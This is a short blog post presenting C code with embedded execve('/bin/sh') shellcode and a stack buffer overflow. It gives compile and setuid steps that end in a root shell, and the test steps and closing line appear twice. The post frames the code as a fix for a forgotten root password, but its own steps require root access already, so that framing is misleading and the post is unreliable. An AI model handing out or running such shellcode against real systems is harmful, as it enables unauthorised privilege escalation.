If you forgot your root password and wish to access it to change... They code below can be used :)
#include "string.h"
#include "stdio.h"
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
char large_string[128];
int main(int argc, char **argv){
char buffer[96];
int i;
long *long_ptr = (long *) large_string;
for (i = 0; i < 32; i++)
*(long_ptr + i) = (int) buffer;
for (i = 0; i < (int) strlen(shellcode); i++)
large_string[i] = shellcode[i];
strcpy(buffer, large_string);
return 0;
}
HOWEVER... it is strictly for your own purposes ONLY. It shall not be used as hacking tool.
Use VM to test it out :)
to test:
$ gcc bof.c
$ su
Password:
# chown root.root a.out
# chmod u+s a.out
$ whoami
YourName
$ ./a.out
$ whoami
root
You know gain root shell access and can execute anything as root rights... Scary ya...
to test:
$ gcc bof.c
$ su
Password:
# chown root.root a.out
# chmod u+s a.out
$ whoami
YourName
$ ./a.out
$ whoami
root
You know gain root shell access and can execute anything as root rights... Scary ya...
0 comments:
Post a Comment